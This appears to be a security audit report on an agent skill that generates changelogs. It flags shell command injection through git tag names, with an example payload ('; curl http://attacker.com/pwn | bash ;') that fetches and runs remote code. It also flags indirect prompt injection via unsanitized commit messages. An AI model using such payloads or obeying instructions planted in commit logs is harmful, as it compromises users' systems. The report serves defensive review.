The Agent Skills Directory

[COMMAND_EXECUTION]: The script scripts/changelog-generator.py is vulnerable to shell command injection. It constructs a git command string using f-strings (e.g., f'git log {from_ref}..{to_ref} ...') and executes it via subprocess.run(..., shell=True). The from_ref variable is often populated by the result of git describe, which returns git tags. If an attacker creates a maliciously named tag (e.g., ; curl http://attacker.com/pwn | bash ;), the injected command will be executed when the script runs.
[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection through git commit logs.
Ingestion points: Git commit messages enter the agent's context through scripts/changelog-generator.py and scripts/changelog-generator.sh during the changelog generation process.
Boundary markers: The generated CHANGELOG.md uses standard markdown formatting but does not implement specific delimiters or warnings to treat commit-derived content as untrusted data.
Capability inventory: The skill has capabilities to write files (CHANGELOG.md) and execute shell commands (git, npm, cargo).
Sanitization: Commit descriptions are extracted via regex and placed directly into the final markdown output without any escaping or sanitization of potentially malicious instructions embedded in the commit history.
[COMMAND_EXECUTION]: The shell scripts scripts/changelog-generator.sh and scripts/changelog-validator.sh expand variables such as $version and $CHANGELOG_FILE directly within shell commands. This lacks robust sanitization and could lead to unexpected behavior if run in an environment with untrusted file names or version strings.
[REMOTE_CODE_EXECUTION]: The skill documentation suggests the installation and use of several third-party tools, such as bump2version via PyPI and standard-version or conventional-changelog-cli via NPM. These represent external code dependencies that are executed in the host environment.

changelog